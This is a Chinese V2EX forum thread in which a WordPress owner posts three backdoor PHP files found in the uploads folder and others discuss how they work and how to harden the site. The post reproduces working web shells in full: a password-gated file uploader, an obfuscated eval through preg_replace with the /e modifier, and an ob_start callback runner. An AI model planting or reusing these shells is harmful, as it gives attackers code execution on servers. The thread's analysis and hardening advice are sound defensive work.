一个 WordPress 站,疑似被传后门

2017-08-27 22:28:06 +08:00
 Hardrain

今检查 wordpress 的上传目录wp-content/uploads

发现 3 个.php文件

第一个./2014/12/conf-72e 内容如下

<?php if(isset($_GET["ms-load"]) && md5($_GET["ms-load"])=="10c0d9d7dbb63d34fdb2cafee8782911"){
$p=$_SERVER["DOCUMENT_ROOT"];
$tyuf=dirname(__FILE__);
echo <<<HTML
<form enctype="multipart/form-data"  method="POST">
Path:$p<br>
<input name="file" type="file"><br>
To:<br>
<input size="48" value="$tyuf/" name="pt" type="text"><br>
<input type="submit" value="Upload">
HTML;
if (isset($_POST["pt"])){
$uploadfile = $_POST["pt"].$_FILES["file"]["name"];
if ($_POST["pt"]==""){$uploadfile = $_FILES["file"]["name"];}
if (copy($_FILES["file"]["tmp_name"], $uploadfile)){
echo"uploaded:$uploadfile";
echo"Size:".$_FILES["file"]["size"]."n";
}else {
print "Error:n";
}
}
}

第二个./2015/03/conf-72 内容如下

<?php isset($_POST['8rfhxs']) && ($www= $_POST['8rfhxs']) && @preg_replace('/ad/e','@'.str_rot13('riny').'($www)', 'add');

第三个./2015/07/cp1251-72 内容如下

<?php
    if(isset($_GET['8rfhxs']) && isset($_GET['catid'])){
	$id = $_GET['8rfhxs'];
	echo $catid = isset($_GET['catid'])?base64_decode($_GET['catid']):'';
	$s = '';
	foreach(array($id) as $v){
	    $s.=$v;
	}
	ob_start($s);
	if($catid){
	    echo $catid;
	}
	ob_end_flush();
}

这三个好像都和传入参数有关,但里面变量不少,尤其是第一个(看起来像是先检测传入参数的 MD5,如吻合,就 POST 站点根目录下的什么东西,也没体现到什么域名 /IP,看起来很像后门.)

上传时间都是 16 年 12 月,那时我已在上传目录的.htaccess添加了php_flag engine off,使这个目录下的 PHP 文件不被解析。

可能因此骇客没得手.

5799 次点击
所在节点    PHP
25 条回复
fucker
2017-08-28 16:56:46 +08:00
@Hardrain 明显不是窃取,很明显的 $uploadfile
你仔细看一下代码执行的过程,是将 POST 中的文件取出,然后用 copy 函数复制(保存)
最简单的方法,你本地搭个 PHP 环境试一下就知道了 :)
loser
2017-08-29 11:10:40 +08:00
防不胜防,奇技淫巧真是多啊,现在的玩法真是溜的 1b
ragnaroks
2017-08-30 08:39:49 +08:00
wordpress 安装好给予 / 禁止写权限,装个插件将所有附件存到 bos/oss/s3 等,手动升级 /装插件
ragnaroks
2017-08-30 08:40:36 +08:00
如果是阿帕奇的话就不行了,不能禁止根目录写,不然 500,原因未知
Hardrain
2017-08-30 23:54:31 +08:00
@ragnaroks 我试过了 是可以的

find /var/www/domain.tld/ -type f -exec chmod 444 {} +
find /var/www/domain.tld/ -type d -exec chmod 555 {} +

没有出 500
但是这的确很不方便。

这是一个专为移动设备优化的页面(即为了让你能够在 Google 搜索结果里秒开这个页面),如果你希望参与 V2EX 社区的讨论,你可以继续到 V2EX 上打开本讨论主题的完整版本。

https://www.v2ex.com/t/386206

V2EX 是创意工作者们的社区,是一个分享自己正在做的有趣事物、交流想法,可以遇见新朋友甚至新机会的地方。

V2EX is a community of developers, designers and creative people.

© 2021 V2EX